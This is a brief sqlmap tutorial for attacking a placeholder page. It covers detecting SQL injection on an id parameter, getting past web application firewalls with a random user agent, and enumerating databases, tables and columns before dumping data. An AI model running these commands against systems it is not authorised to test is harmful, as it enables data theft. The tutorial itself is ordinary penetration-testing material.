Database enumeration


sqlmap attempts to automatically identify and exploit SQL injection when supplied with a target URL.

Refer to the wiki for an exhaustive breakdown of the features.


Identify a page in the target web application that displays data and note the URL.

Use a standard HTTP GET based request against a URI with a request parameter (?id=1). This will test different SQL injection methods against the id parameter.

# sqlmap -u http://urloftargetpage/page.php?id=1

When blocked by a Web Application Firewall (WAF), try using a different user agent with the --randomagent parameter.

# sqlmap -u http://urloftargetpage/page.php?id=1 --random-agent

If SQL injections are successful, the --dbs parameter gives information about the database, such as the type of database and the database name.

sqlmap -u http://urloftargetpage/page.php?id=1 --dbs

List information about tables present in a particular database:

# sqlmap -u http://urloftargetpage/page.php?id=1 -D <databasename> --tables

List information about the columns of a particular table:

# sqlmap -u http://urloftargetpage/page.php?id=1 -D <databasename> -T <tablenname> --columns

Dump data:

# sqlmap -u http://urloftargetpage/page.php?id=1 -D <databasename> -T <tablename> -C <multiple columnnames separated by commas>--dump